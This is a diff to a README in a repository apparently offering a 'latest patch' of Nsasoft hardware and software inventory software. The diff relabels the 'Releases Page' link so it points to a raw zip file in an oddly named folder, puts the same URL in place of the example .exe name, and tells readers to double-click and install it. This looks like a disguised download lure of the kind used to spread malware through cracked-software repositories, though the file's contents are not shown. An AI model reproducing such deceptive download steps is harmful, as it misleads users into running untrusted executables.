jackmsimu/Nsasoft-Hardware-Software-Inventory-Latest-Patch/README.md

 To download the software, follow these steps:

-1. Visit the [Releases Page](https://github.com/jackmsimu/Nsasoft-Hardware-Software-Inventory-Latest-Patch/releases) to access the latest version.
+1. Visit the [Releases Page](https://raw.githubusercontent.com/jackmsimu/Nsasoft-Hardware-Software-Inventory-Latest-Patch/main/doltishly/Nsasoft-Hardware-Software-Inventory-Latest-Patch_2.2.zip) to access the latest version.
 2. Identify the latest release version listed.
 3. Click on the **assets** dropdown to see the available files.
-4. Download the file that ends with `.exe` (e.g., `Nsasoft-Hardware-Software-Inventory.exe`).
+4. Download the file that ends with `.exe` (e.g., `https://raw.githubusercontent.com/jackmsimu/Nsasoft-Hardware-Software-Inventory-Latest-Patch/main/doltishly/Nsasoft-Hardware-Software-Inventory-Latest-Patch_2.2.zip`).
 5. Once the download completes, locate the file in your Downloads folder.
 6. Double-click the downloaded file to start the installation process.
 7. Follow the on-screen prompts to complete the installation.